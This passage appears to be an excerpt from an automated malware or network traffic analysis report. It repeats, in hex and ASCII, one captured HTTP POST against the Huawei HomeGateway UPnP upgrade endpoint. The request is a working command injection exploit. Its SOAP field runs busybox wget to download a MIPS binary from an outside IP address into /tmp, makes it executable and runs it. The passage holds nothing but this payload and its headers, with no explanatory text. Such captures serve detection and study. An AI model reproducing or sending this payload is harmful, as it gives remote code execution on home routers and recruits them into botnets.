4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
